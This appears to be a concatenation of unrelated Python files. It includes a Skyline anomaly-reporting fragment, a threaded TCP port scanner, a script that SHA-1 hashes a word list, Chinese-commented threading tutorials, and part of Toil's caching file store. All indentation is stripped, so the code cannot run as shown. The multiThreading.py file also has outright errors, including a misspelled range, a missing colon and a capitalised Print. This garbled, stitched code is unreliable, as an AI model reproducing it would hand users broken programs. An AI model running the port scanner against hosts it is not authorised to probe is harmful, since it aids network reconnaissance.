anomaly_breakdown = dict()
while 1:
try:
key, value = self.batch_anomaly_breakdown_q.get_nowait()
if key not in anomaly_breakdown.keys():
anomaly_breakdown[key] = value
else:
anomaly_breakdown[key] += value
except Empty:
break
while 1:
try:
key, value = self.batch_exceptions_q.get_nowait()
if key not in exceptions.keys():
exceptions[key] = value
else:
exceptions[key] += value
except Empty:
break
# @added 20200904 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Task #3730: Validate Mirage running multiple processes
# Report any algorithm errors
pattern = '%s.*.algorithm.error' % skyline_app
try:
for f in os.listdir(settings.SKYLINE_TMP_DIR):
if re.search(pattern, f):
try:
algorithm_error_file = os.path.join(settings.SKYLINE_TMP_DIR, f)
if os.path.isfile(algorithm_error_file):
logger.error('error :: error reported in %s' % (
algorithm_error_file))
try:
with open(algorithm_error_file, 'r') as f:
error_string = f.read()
logger.error('%s' % str(error_string))
except:
logger.error('error :: failed to read error file - %s' % algorithm_error_file)
try:
os.remove(algorithm_error_file)
except OSError:
pass
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to check algorithm errors')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to check algorithm errors')
# @added 20191021 - Bug #3288: Always send anomaly_breakdown and exception metrics
# Branch #3262: py3
exceptions_metrics = ['Boring', 'Stale', 'TooShort', 'Other']
try:
for i_exception in exceptions_metrics:
if i_exception not in exceptions.keys():
exceptions[i_exception] = 0
# @added 20200607 - Feature #3566: custom_algorithms
anomaly_breakdown_algorithms = list(settings.ALGORITHMS)
if CUSTOM_ALGORITHMS:
for custom_algorithm in settings.CUSTOM_ALGORITHMS:
anomaly_breakdown_algorithms.append(custom_algorithm)
# @modified 20200607 - Feature #3566: custom_algorithms
# for i_anomaly_breakdown in settings.ALGORITHMS:
for i_anomaly_breakdown in anomaly_breakdown_algorithms:
if i_anomaly_breakdown not in anomaly_breakdown.keys():
anomaly_breakdown[i_anomaly_breakdown] = 0
exceptions_string = ''
for i_exception in exceptions.keys():
if exceptions_string == '':
exceptions_string = '%s: %s' % (str(i_exception), str(exceptions[i_exception]))
else:
exceptions_string = '%s, %s: %s' % (exceptions_string, str(i_exception), str(exceptions[i_exception]))
logger.info('exceptions - %s' % str(exceptions_string))
anomaly_breakdown_string = ''
if anomaly_breakdown:
for i_anomaly_breakdown in anomaly_breakdown.keys():
if anomaly_breakdown_string == '':
anomaly_breakdown_string = '%s: %s' % (str(i_anomaly_breakdown), str(anomaly_breakdown[i_anomaly_breakdown]))
else:
anomaly_breakdown_string = '%s, %s: %s' % (anomaly_breakdown_string, str(i_anomaly_breakdown), str(anomaly_breakdown[i_anomaly_breakdown]))
logger.info('anomaly_breakdown - %s' % str(anomaly_breakdown_string))
else:
logger.info('anomaly_breakdown - none, no anomalies')
except:
logger.error(traceback.format_exc())
logger.error('error :: could not exceptions and anomaly_breakdown details')
try:
del exceptions
except:
pass
try:
del anomaly_breakdown
except:
pass
try:
with self.batch_exceptions_q.mutex:
self.batch_exceptions_q.queue.clear()
except:
pass
try:
with self.batch_anomaly_breakdown_q.mutex:
self.batch_anomaly_breakdown_q.queue.clear()
except:
pass
|
port_scanner.py
|
import threading, socket, sys
import tld # Top Level Domain
from queue import Queue
user_inputs = sys.argv # It's a LIST of STRING
print_lock = threading.Lock()
# Can be a Domain name or IP Address
# Note: user_inputs[0] it's a script's path so you don't need it
target = user_inputs[1]
q = Queue()
def portscan(port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
con = s.connect((target, port))
with print_lock:
print('Port ', port, ' is Open!!!!!!!!')
con.close()
except:
pass
for port in range(int(user_inputs[2]), int(user_inputs[3])):
q.put(port)
def threader():
while True:
getting_port = q.get()
portscan(getting_port)
q.task_done()
for x in range(int(user_inputs[4])-1):
t = threading.Thread(target=threader, args=())
t.daemon = True
t.start()
print("\n******** You have ", threading.active_count(), "Running threads ***********\n")
q.join()
|
no_thread.py
|
from time import time, ctime
import hashlib
import threading
def main():
with open("smalldict.txt", "r")as f:
list = f.readlines()
with open("sha_1_no.txt", "a")as s:
start_time = time()
for i in list:
word = i.strip("\n")
t = threading.Thread(target=threads, args=(s, word))
t.start()
print("finished in "+str(time() - start_time))
def threads(s, word):
s.write(hashlib.sha1(word).hexdigest()+"\n")
if __name__=="__main__":
main()
|
util_threading.py
|
# coding: UTF-8
import threading
import _thread # 兼容py2.0的多线程
import time
import queue
# 为线程定义一个函数
def print_time(thread_name, delay, counter):
while counter:
time.sleep(delay)
print("%s: %s" % (thread_name, time.ctime(time.time())))
counter -= 1
def print_time_return(thread_name, delay, counter):
rtn = []
while counter:
time.sleep(delay)
rtn.append((thread_name, time.ctime(time.time())))
print("%s: %s" % (thread_name, time.ctime(time.time())))
counter -= 1
return rtn
# threading.Thread 继承创建子类,实例化后调用start()方法启动新线程,即它调用了线程的run() 方法,好处是可任意重写
class MyThread (threading.Thread):
def __init__(self, thread_id, name, delay, counter):
threading.Thread.__init__(self)
self.threadID = thread_id
self.name = name
self.delay = delay
self.counter = counter
def run(self):
print("开始线程:" + self.name)
# # 获取锁,锁住后其他进程将暂停直到该线程释放
# threadLock.acquire()
print_time(self.name, self.delay, self.counter)
print("退出线程:" + self.name)
# # 释放锁,开启下一个线程
# threadLock.release()
threadLock = threading.Lock()
class MyThreadQ (threading.Thread):
def __init__(self, threadID, name, q):
threading.Thread.__init__(self)
self.threadID = threadID
self.name = name
self.q = q
def run(self):
print("开启线程:" + self.name)
process_data(self.name, self.q)
print("退出线程:" + self.name)
def process_data(threadName, q):
while not exitFlag:
queueLock.acquire()
if not workQueue.empty():
data = q.get()
queueLock.release()
print("%s processing %s" % (threadName, data))
else:
queueLock.release()
time.sleep(1)
exitFlag = 0
workQueue = queue.Queue(10)
queueLock = threading.Lock()
# 创建两个线程
try:
# ============================================================
# # 直接起线程
# # 主线程(如果主线程结束所有子线程会一起结束,不管子线程是否结束)
# # _thread.start_new_thread(print_time, ("Thread-1", 1, 3)) # Py2.0
# # _thread.start_new_thread(print_time, ("Thread-2", 2, 3))
# thread1 = threading.Thread(target=print_time, args=("Thread-1", 1, 3)) # py3.0
# thread2 = threading.Thread(target=print_time, args=("Thread-2", 2, 3))
# thread1.start()
# thread2.start()
threads = []
thread1 = threading.Thread(target=print_time_return, args=("Thread-1", 1, 3)) # py3.0
thread2 = threading.Thread(target=print_time_return, args=("Thread-2", 2, 3))
thread1.start()
thread2.start()
ccc = 10
while ccc > 0:
time.sleep(1)
print(thread1.isAlive(), thread2.isAlive())
ccc -= 1
# ============================================================
# # 通过类创建线程
# thread1 = MyThread(1, "Thread-A", 1, 3)
# thread2 = MyThread(2, "Thread-B", 2, 3)
#
# list_tsk = []
# list_tsk.append(thread1)
# list_tsk.append(thread2)
#
# # for tsk in list_tsk:
# # # 启动线程
# # tsk.start()
# # tsk.join() # 加入主线程,join后必须等待该线程结束才能继续后续代码,此前已经启动的线程不受影响
#
# # join的执行顺序对比:
# for tsk in list_tsk:
# # 启动线程
# tsk.start()
#
# # for tsk in list_tsk:
# # tsk.join() # 加入主线程,join后必须等待该线程结束才能继续后续代码,Join可输入参数等待时间s
#
# ccc = 10
# while ccc > 0:
# time.sleep(1)
# print(thread1.isAlive(), thread2.isAlive())
# ccc -= 1
# ============================================================
# thread_ist = ["Thread-1", "Thread-2", "Thread-3"]
# name_list = ["One", "Two", "Three", "Four", "Five"]
# threads = []
# thread_id = 1
#
# # 创建新线程
# for tName in thread_ist:
# thread = MyThreadQ(thread_id, tName, workQueue)
# thread.start()
# threads.append(thread)
# thread_id += 1
#
# # 填充队列
# queueLock.acquire()
# for word in name_list:
# workQueue.put(word)
# queueLock.release()
#
# # 等待队列清空
# while not workQueue.empty():
# pass
#
# # 通知线程是时候退出
# exitFlag = 1
#
# # 等待所有线程完成
# for t in threads:
# t.join()
# ============================================================
print("我是后续代码")
except:
print("Error: 无法启动线程")
# -*-* encoding:UTF-8 -*-
# 展示加锁和不加锁时,对数据修改情况
import threading
import time
list = [0,0,0,0,0,0,0,0,0,0,0,0]
class myThread(threading.Thread):
def __init__(self,threadId,name,counter):
threading.Thread.__init__(self)
self.threadId = threadId
self.name = name
self.counter = counter
def run(self):
print("开始线程:",self.name)
# 获得锁,成功获得锁定后返回 True
# 可选的timeout参数不填时将一直阻塞直到获得锁定
# 否则超时后将返回 False
threadLock.acquire()
print_time(self.name,self.counter,list.__len__())
# 释放锁
threadLock.release()
def __del__(self):
print(self.name,"线程结束!")
def print_time(threadName,delay,counter):
while counter:
time.sleep(delay)
list[counter-1] += 1
print("[%s] %s 修改第 %d 个值,修改后值为:%d" % (time.ctime(time.time()),threadName,counter,list[counter-1]))
counter -= 1
threadLock = threading.Lock()
threads = []
# 创建新线程
thread1 = myThread(1,"Thread-1",1)
thread2 = myThread(2,"Thread-2",2)
# 开启新线程
thread1.start()
thread2.start()
# 添加线程到线程列表
threads.append(thread1)
threads.append(thread2)
# 等待所有线程完成
for t in threads:
t.join()
print("主进程结束!")
#!/usr/bin/python3
import time
import threading
import sys
import threading
import queue
q = queue.Queue()
def worker1(x, y):
func_name = sys._getframe().f_code.co_name
print("%s run ..." % func_name)
q.put((x + y, func_name))
def worker2(x, y):
func_name = sys._getframe().f_code.co_name
print("%s run ...." % func_name)
q.put((x - y, func_name))
if __name__ == '__main__':
result = list()
t1 = threading.Thread(target=worker1, name='thread1', args=(10, 5, ))
t2 = threading.Thread(target=worker2, name='thread2', args=(20, 1, ))
print('-' * 50)
t1.start()
t2.start()
t1.join()
t2.join()
while not q.empty():
result.append(q.get())
print(result)
for item in result:
if item[1] == worker1.__name__:
print("%s 's return value is : %s" % (item[1], item[0]))
elif item[1] == worker2.__name__:
print("%s 's return value is : %s" % (item[1], item[0]))
#!/usr/bin/python3
import threading
import time
# MyThread.py线程类
class MyThread(threading.Thread):
def __init__(self, func, args=()):
super(MyThread, self).__init__()
self.func = func
self.args = args
def run(self):
self.result = self.func(*self.args)
def get_result(self):
threading.Thread.join(self) # 等待线程执行完毕
try:
return self.result
except Exception:
return None
def add():
sumup = 0
for iii in range(5):
sumup+=1
# print(sumup)
time.sleep(1)
return sumup
if __name__=="__main__":
thrds = []
# 创建4个线程
for i in range(3):
task = MyThread(add, )
thrds.append(task)
#
# for thrd in thrds:
# print(thrd.get_result())
|
multiThreading.py
|
from time import sleep
from threading import Thread
class Hello(Thread):
def run():
for i in ramge(5):
print("Hello")
sleep(1)
class Hi(Thread)
def run():
for i in range(5):
print("Hi")
sleep(1)
hello = Hello()
hi = Hi()
hello.start()
sleep(0.2)
hi.start()
hello.join()
hi.join()
print("Bye")
print("Bye2")
# MULTI THREADING WITHOUT USING CLASSES
def hello():
for i in range(5):
Print("Hello")
def hi():
for i in range(5):
print("Hi")
t1 = Thread(target= hello)
t2 = Thread(target= hi)
t1.start()
t2.start()
t1.join()
t2.join()
print("Bye")
|
cachingFileStore.py
|
# Copyright (C) 2015-2018 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from contextlib import contextmanager
import errno
import hashlib
import logging
import os
import re
import shutil
import sqlite3
import sys
import tempfile
import threading
import time
import uuid
from toil.common import cacheDirName, getDirSizeRecursively, getFileSystemSize
from toil.lib.bioio import makePublicDir
from toil.lib.humanize import bytes2human
from toil.lib.misc import robust_rmtree, atomic_copy, atomic_copyobj
from toil.lib.retry import retry, ErrorCondition
from toil.lib.threading import get_process_name, process_name_exists
from toil.fileStores.abstractFileStore import AbstractFileStore
from toil.fileStores import FileID
logger = logging.getLogger(__name__)
# Use longer timeout to avoid hitting 'database is locked' errors.
SQLITE_TIMEOUT_SECS = 60.0
class CacheError(Exception):
"""
Error Raised if the user attempts to add a non-local file to cache
"""
def __init__(self, message):
super(CacheError, self).__init__(message)
class CacheUnbalancedError(CacheError):
"""
Raised if file store can't free enough space for caching
"""
message = 'Unable unable to free enough space for caching. This error frequently arises due ' \
'to jobs using more disk than they have requested. Turn on debug logging to see ' \
'more information leading up to this error through cache usage logs.'
def __init__(self):
super(CacheUnbalancedError, self).__init__(self.message)
class IllegalDeletionCacheError(CacheError):
"""
Error raised if the caching code discovers a file that represents a
reference to a cached file to have gone missing.
This can be a big problem if a hard link is moved, because then the cache
will be unable to evict the file it links to.
Remember that files read with readGlobalFile may not be deleted by the user
and need to be deleted with deleteLocalFile.
"""
def __init__(self, deletedFile):
message = 'Cache tracked file (%s) has been deleted or moved by user ' \
' without updating cache database. Use deleteLocalFile to ' \
'delete such files.' % deletedFile
super(IllegalDeletionCacheError, self).__init__(message)
class InvalidSourceCacheError(CacheError):
"""
Error raised if the user attempts to add a non-local file to cache
"""
def __init__(self, message):
super(InvalidSourceCacheError, self).__init__(message)
class CachingFileStore(AbstractFileStore):
"""
A cache-enabled file store.
Provides files that are read out as symlinks or hard links into a cache
directory for the node, if permitted by the workflow.
Also attempts to write files back to the backing JobStore asynchronously,
after quickly taking them into the cache. Writes are only required to
finish when the job's actual state after running is committed back to the
job store.
Internaly, manages caching using a database. Each node has its own
database, shared between all the workers on the node. The database contains
several tables:
files contains one entry for each file in the cache. Each entry knows the
path to its data on disk. It also knows its global file ID, its state, and
its owning worker PID. If the owning worker dies, another worker will pick
it up. It also knows its size.
File states are:
- "cached": happily stored in the cache. Reads can happen immediately.
Owner is null. May be adopted and moved to state "deleting" by anyone, if
it has no outstanding immutable references.
- "downloading": in the process of being saved to the cache by a non-null
owner. Reads must wait for the state to become "cached". If the worker
dies, goes to state "deleting", because we don't know if it was fully
downloaded or if anyone still needs it. No references can be created to a
"downloading" file except by the worker responsible for downloading it.
- "uploadable": stored in the cache and ready to be written to the job
store by a non-null owner. Transitions to "uploading" when a (thread of)
the owning worker process picks it up and begins uploading it, to free
cache space or to commit a completed job. If the worker dies, goes to
state "cached", because it may have outstanding immutable references from
the dead-but-not-cleaned-up job that was going to write it.
- "uploading": stored in the cache and being written to the job store by a
non-null owner. Transitions to "cached" when successfully uploaded. If
the worker dies, goes to state "cached", because it may have outstanding
immutable references from the dead-but-not-cleaned-up job that was
writing it.
- "deleting": in the process of being removed from the cache by a non-null
owner. Will eventually be removed from the database.
refs contains one entry for each outstanding reference to a cached file
(hard link, symlink, or full copy). The table name is refs instead of
references because references is an SQL reserved word. It remembers what
job ID has the reference, and the path the reference is at. References have
three states:
- "immutable": represents a hardlink or symlink to a file in the cache.
Dedicates the file's size in bytes of the job's disk requirement to the
cache, to be used to cache this file or to keep around other files
without references. May be upgraded to "copying" if the link can't
actually be created.
- "copying": records that a file in the cache is in the process of being
copied to a path. Will be upgraded to a mutable reference eventually.
- "mutable": records that a file from the cache was copied to a certain
path. Exist only to support deleteLocalFile's API. Only files with only
mutable references (or no references) are eligible for eviction.
jobs contains one entry for each job currently running. It keeps track of
the job's ID, the worker that is supposed to be running the job, the job's
disk requirement, and the job's local temp dir path that will need to be
cleaned up. When workers check for jobs whose workers have died, they null
out the old worker, and grab ownership of and clean up jobs and their
references until the null-worker jobs are gone.
properties contains key, value pairs for tracking total space available,
and whether caching is free for this run.
"""
def __init__(self, jobStore, jobGraph, localTempDir, waitForPreviousCommit):
super(CachingFileStore, self).__init__(jobStore, jobGraph, localTempDir, waitForPreviousCommit)
# For testing, we have the ability to force caching to be non-free, by never linking from the file store
self.forceNonFreeCaching = False
# Also for testing, we have the ability to force a delay (in seconds)
# during file download from the job store, in order to easily test the
# behavior of the system when a download is in progress.
self.forceDownloadDelay = None
# When waiting for other running workers to download a file, or
# otherwise progress, how long in seconds should we wait between
# polling attempts? Our mechanism for polling involves an exclusive
# lock on the database and conditional writes, so this should be high
# enough that everyone isn't constantly contending for the lock.
self.contentionBackoff = 15
# Variables related to caching
# Decide where the cache directory will be. We put it next to the
# local temp dirs for all of the jobs run on this machine.
# At this point in worker startup, when we are setting up caching,
# localTempDir is the worker directory, not the job directory.
self.localCacheDir = os.path.join(os.path.dirname(localTempDir),
cacheDirName(self.jobStore.config.workflowID))
# Since each worker has it's own unique CachingFileStore instance, and only one Job can run
# at a time on a worker, we can track some stuff about the running job in ourselves.
self.jobName = str(self.jobGraph)
self.jobID = self.jobGraph.jobStoreID
logger.debug('Starting job (%s) with ID (%s).', self.jobName, self.jobID)
# When the job actually starts, we will fill this in with the job's disk requirement.
self.jobDiskBytes = None
# We need to track what attempt of the workflow we are, to prevent crosstalk between attempts' caches.
self.workflowAttemptNumber = self.jobStore.config.workflowAttemptNumber
# Make sure the cache directory exists
os.makedirs(self.localCacheDir, exist_ok=True)
# Connect to the cache database in there, or create it if not present.
# We name it by workflow attempt number in case a previous attempt of
# the workflow left one behind without cleaning up properly; we need to
# be able to tell that from showing up on a machine where a cache has
# already been created.
self.dbPath = os.path.join(self.localCacheDir, 'cache-{}.db'.format(self.workflowAttemptNumber))
# We need to hold onto both a connection (to commit) and a cursor (to actually use the database)
self.con = sqlite3.connect(self.dbPath, timeout=SQLITE_TIMEOUT_SECS)
self.cur = self.con.cursor()
# Note that sqlite3 automatically starts a transaction when we go to
# modify the database.
# To finish this transaction and let other people read our writes (or
# write themselves), we need to COMMIT after every coherent set of
# writes.
# Set up the tables
self._ensureTables(self.con)
# Initialize the space accounting properties
freeSpace, _ = getFileSystemSize(self.localCacheDir)
self._write([('INSERT OR IGNORE INTO properties VALUES (?, ?)', ('maxSpace', freeSpace))])
# Space used by caching and by jobs is accounted with queries
# We maintain an asynchronous upload thread, which gets kicked off when
# we commit the job's completion. It will be None until then. When it
# is running, it has exclusive control over our database connection,
# because the job we exist for will have already completed. However, it
# has to coordinate its activities with other CachingFileStore objects
# in the same process (and thus sharing the same PID) and ensure that
# only one of them is working on uploading any given file at any given
# time.
self.commitThread = None
@staticmethod
@retry(infinite_retries=True,
errors=[
ErrorCondition(
error=sqlite3.OperationalError,
error_message_must_include='is locked')
])
def _staticWrite(con, cur, operations):
"""
Write to the caching database, using the given connection.
If we can't get an SQLite write lock on the database, retry with some
backoff until we can.
operations is a list of tuples of (sql string, optional tuple of values
to substitute), or bare sql strings.
All operations are executed in a single transaction, which is
committed.
:param sqlite3.Connection con: Connection to the cache database.
:param sqlite3.Cursor cur: Cursor in the cache database.
:param list operations: List of sql strings or tuples of (sql, optional values) to execute.
:return: Number of rows modified by the last operation
:rtype: int
"""
try:
for item in operations:
if not isinstance(item, tuple):
# Must be a single SQL string. Wrap it.
item = (item,)
# Parse out the command and the variables to substitute
command = item[0]
if len(item) < 2:
args = ()
else:
args = item[1]
# Do it
cur.execute(command, args)
except Exception as e:
logging.error('Error talking to caching database: %s', str(e))
# Try to make sure we don't somehow leave anything part-done if a
# middle operation somehow fails.
try:
con.rollback()
except:
# But don't stop if we can't roll back.
pass
# Raise and maybe retry
raise e
else:
# The transaction worked!
# Now commit the transaction.
con.commit()
return cur.rowcount
def _write(self, operations):
"""
Write to the caching database, using the instance's connection
If we can't get an SQLite write lock on the database, retry with some
backoff until we can.
operations is a list of tuples of (sql string, optional tuple of values
to substitute), or bare sql strings.
All operations are executed in a single transaction, which is
committed.
:param list operations: List of sql strings or tuples of (sql, optional values) to execute.
:return: Number of rows modified by the last operation
:rtype: int
"""
return self._staticWrite(self.con, self.cur, operations)
@classmethod
def _ensureTables(cls, con):
"""
Ensure that the database tables we expect exist.
:param sqlite3.Connection con: Connection to the cache database.
"""
# Get a cursor
cur = con.cursor()
cls._staticWrite(con, cur, ["""
CREATE TABLE IF NOT EXISTS files (
id TEXT NOT NULL PRIMARY KEY,
path TEXT UNIQUE NOT NULL,
size INT NOT NULL,
state TEXT NOT NULL,
owner TEXT
)
""", """
CREATE TABLE IF NOT EXISTS refs (
path TEXT NOT NULL,
file_id TEXT NOT NULL,
job_id TEXT NOT NULL,
state TEXT NOT NULL,
PRIMARY KEY (path, file_id)
)
""", """
CREATE TABLE IF NOT EXISTS jobs (
id TEXT NOT NULL PRIMARY KEY,
tempdir TEXT NOT NULL,
disk INT NOT NULL,
worker TEXT
)
""", """
CREATE TABLE IF NOT EXISTS properties (
name TEXT NOT NULL PRIMARY KEY,
value INT NOT NULL
)
"""])
# Caching-specific API
def getCacheLimit(self):
"""
Return the total number of bytes to which the cache is limited.
If no limit is available, raises an error.
"""
for row in self.cur.execute('SELECT value FROM properties WHERE name = ?', ('maxSpace',)):
return row[0]
raise RuntimeError('Unable to retrieve cache limit')
def getCacheUsed(self):
"""
Return the total number of bytes used in the cache.
If no value is available, raises an error.
"""
# Space never counts as used if caching is free
if self.cachingIsFree():
return 0
for row in self.cur.execute('SELECT TOTAL(size) FROM files'):
return row[0]
raise RuntimeError('Unable to retrieve cache usage')
def getCacheExtraJobSpace(self):
"""
Return the total number of bytes of disk space requested by jobs
running against this cache but not yet used.
We can get into a situation where the jobs on the node take up all its
space, but then they want to write to or read from the cache. So when
that happens, we need to debit space from them somehow...
If no value is available, raises an error.
"""
# Total up the sizes of all the reads of files and subtract it from the total disk reservation of all jobs
for row in self.cur.execute("""
SELECT (
(SELECT TOTAL(disk) FROM jobs) -
(SELECT TOTAL(files.size) FROM refs INNER JOIN files ON refs.file_id = files.id WHERE refs.state == 'immutable')
) as result
"""):
return row[0]
raise RuntimeError('Unable to retrieve extra job space')
def getCacheAvailable(self):
"""
Return the total number of free bytes available for caching, or, if
negative, the total number of bytes of cached files that need to be
evicted to free up enough space for all the currently scheduled jobs.
If no value is available, raises an error.
"""
# Get the max space on our disk.
# Subtract out the number of bytes of cached content.
# Also subtract out the number of bytes of job disk requirements that
# aren't being spent by those jobs on immutable references to cached
# content.
# Do a little report first
for row in self.cur.execute("SELECT value FROM properties WHERE name = 'maxSpace'"):
logger.debug('Max space: %d', row[0])
for row in self.cur.execute("SELECT TOTAL(size) FROM files"):
logger.debug('Total file size: %d', row[0])
for row in self.cur.execute("SELECT TOTAL(disk) FROM jobs"):
logger.debug('Total job disk requirement size: %d', row[0])
for row in self.cur.execute("SELECT TOTAL(files.size) FROM refs INNER JOIN files ON refs.file_id = files.id WHERE refs.state = 'immutable'"):
logger.debug('Total immutable reference size: %d', row[0])
if self.cachingIsFree():
# If caching is free, we just say that all the space is always available.
for row in self.cur.execute("SELECT value FROM properties WHERE name = 'maxSpace'"):
return row[0]
raise RuntimeError('Unable to retrieve available cache space')
for row in self.cur.execute("""
SELECT (
(SELECT value FROM properties WHERE name = 'maxSpace') -
(SELECT TOTAL(size) FROM files) -
((SELECT TOTAL(disk) FROM jobs) -
(SELECT TOTAL(files.size) FROM refs INNER JOIN files ON refs.file_id = files.id WHERE refs.state = 'immutable'))
) as result
"""):
return row[0]
raise RuntimeError('Unable to retrieve available cache space')
def getSpaceUsableForJobs(self):
"""
Return the total number of bytes that are not taken up by job requirements, ignoring files and file usage.
We can't ever run more jobs than we actually have room for, even with caching.
If not retrievable, raises an error.
"""
for row in self.cur.execute("""
SELECT (
(SELECT value FROM properties WHERE name = 'maxSpace') -
(SELECT TOTAL(disk) FROM jobs)
) as result
"""):
return row[0]
raise RuntimeError('Unable to retrieve usabel space for jobs')
def getCacheUnusedJobRequirement(self):
"""
Return the total number of bytes of disk space requested by the current
job and not used by files the job is using in the cache.
Mutable references don't count, but immutable/uploading ones do.
If no value is available, raises an error.
"""
logger.debug('Get unused space for job %s', self.jobID)
for row in self.cur.execute('SELECT * FROM files'):
logger.debug('File record: %s', str(row))
for row in self.cur.execute('SELECT * FROM refs'):
logger.debug('Ref record: %s', str(row))
for row in self.cur.execute('SELECT TOTAL(files.size) FROM refs INNER JOIN files ON refs.file_id = files.id WHERE refs.job_id = ? AND refs.state != ?',
(self.jobID, 'mutable')):
# Sum up all the sizes of our referenced files, then subtract that from how much we came in with
return self.jobDiskBytes - row[0]
raise RuntimeError('Unable to retrieve unused job requirement space')
def adjustCacheLimit(self, newTotalBytes):
"""
Adjust the total cache size limit to the given number of bytes.
"""
self._write([('UPDATE properties SET value = ? WHERE name = ?', (newTotalBytes, 'maxSpace'))])
def fileIsCached(self, fileID):
"""
Return true if the given file is currently cached, and false otherwise.
Note that this can't really be relied upon because a file may go cached
-> deleting after you look at it. If you need to do something with the
file you need to do it in a transaction.
"""
for row in self.cur.execute('SELECT COUNT(*) FROM files WHERE id = ? AND (state = ? OR state = ? OR state = ?)',
(fileID, 'cached', 'uploadable', 'uploading')):
return row[0] > 0
return False
def getFileReaderCount(self, fileID):
"""
Return the number of current outstanding reads of the given file.
Counts mutable references too.
"""
for row in self.cur.execute('SELECT COUNT(*) FROM refs WHERE file_id = ?', (fileID,)):
return row[0]
return 0
def cachingIsFree(self):
"""
Return true if files can be cached for free, without taking up space.
Return false otherwise.
This will be true when working with certain job stores in certain
configurations, most notably the FileJobStore.
"""
for row in self.cur.execute('SELECT value FROM properties WHERE name = ?', ('freeCaching',)):
return row[0] == 1
# Otherwise we need to set it
from toil.jobStores.fileJobStore import FileJobStore
if isinstance(self.jobStore, FileJobStore) and not self.forceNonFreeCaching:
# Caching may be free since we are using a file job store.
# Create an empty file.
emptyID = self.jobStore.getEmptyFileStoreID()
# Read it out to a generated name.
destDir = tempfile.mkdtemp(dir=self.localCacheDir)
cachedFile = os.path.join(destDir, 'sniffLinkCount')
self.jobStore.readFile(emptyID, cachedFile, symlink=False)
# Check the link count
if os.stat(cachedFile).st_nlink == 2:
# Caching must be free
free = 1
else:
# If we only have one link, caching costs disk.
free = 0
# Clean up
os.unlink(cachedFile)
os.rmdir(destDir)
self.jobStore.deleteFile(emptyID)
else:
# Caching is only ever free with the file job store
free = 0
# Save to the database if we're the first to work this out
self._write([('INSERT OR IGNORE INTO properties VALUES (?, ?)', ('freeCaching', free))])
# Return true if we said caching was free
return free == 1
# Internal caching logic
def _getNewCachingPath(self, fileStoreID):
"""
Get a path at which the given file ID can be cached.
Will be unique for every call.
The file will not be created if it does not exist.
"""
# Hash the file ID
hasher = hashlib.sha1()
hasher.update(fileStoreID.encode('utf-8'))
# Get a unique temp file name, including the file ID's hash to make
# sure we can never collide even though we are going to remove the
# file.
# TODO: use a de-slashed version of the ID instead?
handle, path = tempfile.mkstemp(dir=self.localCacheDir, suffix=hasher.hexdigest())
os.close(handle)
os.unlink(path)
return path
def _stealWorkFromTheDead(self):
"""
Take ownership of any files we can see whose owners have died.
We don't actually process them here. We take action based on the states of files we own later.
"""
me = get_process_name(self.workDir)
# Get a list of all file owner processes on this node.
# Exclude NULL because it comes out as 0 and we can't look for PID 0.
owners = []
for row in self.cur.execute('SELECT DISTINCT owner FROM files WHERE owner IS NOT NULL'):
owners.append(row[0])
# Work out which of them have died.
deadOwners = []
for owner in owners:
if not process_name_exists(self.workDir, owner):
logger.debug('Owner %s is dead', owner)
deadOwners.append(owner)
else:
logger.debug('Owner %s is alive', owner)
for owner in deadOwners:
# Try and adopt all the files that any dead owner had
# If they were deleting, we delete.
# If they were downloading, we delete. Any outstanding references
# can't be in use since they are from the dead downloader.
# If they were uploading or uploadable, we mark as cached even
# though it never made it to the job store (and leave it unowned).
#
# Once the dead job that it was being uploaded from is cleaned up,
# and there are no longer any immutable references, it will be
# evicted as normal. Since the dead job can't have been marked
# successfully completed (since the file is still not uploaded),
# nobody is allowed to actually try and use the file.
#
# TODO: if we ever let other PIDs be responsible for writing our
# files asynchronously, this will need to change.
self._write([('UPDATE files SET owner = ?, state = ? WHERE owner = ? AND state = ?',
(me, 'deleting', owner, 'deleting')),
('UPDATE files SET owner = ?, state = ? WHERE owner = ? AND state = ?',
(me, 'deleting', owner, 'downloading')),
('UPDATE files SET owner = NULL, state = ? WHERE owner = ? AND (state = ? OR state = ?)',
('cached', owner, 'uploadable', 'uploading'))])
logger.debug('Tried to adopt file operations from dead worker %s to ourselves as %s', owner, me)
@classmethod
def _executePendingDeletions(cls, workDir, con, cur):
"""
Delete all the files that are registered in the database as in the
process of being deleted from the cache by us.
Returns the number of files that were deleted.
Implemented as a class method so it can use the database connection
appropriate to its thread without any chance of getting at the main
thread's connection and cursor in self.
:param str workDir: The Toil work directory.
:param sqlite3.Connection con: Connection to the cache database.
:param sqlite3.Cursor cur: Cursor in the cache database.
"""
me = get_process_name(workDir)
# Remember the file IDs we are deleting
deletedFiles = []
for row in cur.execute('SELECT id, path FROM files WHERE owner = ? AND state = ?', (me, 'deleting')):
# Grab everything we are supposed to delete and delete it
fileID = row[0]
filePath = row[1]
try:
os.unlink(filePath)
logger.debug('Successfully deleted: %s', filePath)
except OSError:
# Probably already deleted
logger.debug('File already gone: %s', filePath)
# Still need to mark it as deleted
pass
# Whether we deleted the file or just found out that it is gone, we
# need to take credit for deleting it so that we remove it from the
# database.
deletedFiles.append(fileID)
for fileID in deletedFiles:
# Drop all the files. They should have stayed in deleting state. We move them from there to not present at all.
# Also drop their references, if they had any from dead downloaders.
cls._staticWrite(con, cur, [('DELETE FROM files WHERE id = ? AND state = ?', (fileID, 'deleting')),
('DELETE FROM refs WHERE file_id = ?', (fileID,))])
return len(deletedFiles)
def _executePendingUploads(self, con, cur):
"""
Uploads all files in uploadable state that we own.
Returns the number of files that were uploaded.
Needs access to self to get at the job store for uploading files, but
still needs to take con and cur so it can run in a thread with the
thread's database connection.
:param sqlite3.Connection con: Connection to the cache database.
:param sqlite3.Cursor cur: Cursor in the cache database.
"""
# Work out who we are
me = get_process_name(self.workDir)
# Record how many files we upload
uploadedCount = 0
while True:
# Try and find a file we might want to upload
fileID = None
filePath = None
for row in cur.execute('SELECT id, path FROM files WHERE state = ? AND owner = ? LIMIT 1', ('uploadable', me)):
fileID = row[0]
filePath = row[1]
if fileID is None:
# Nothing else exists to upload
break
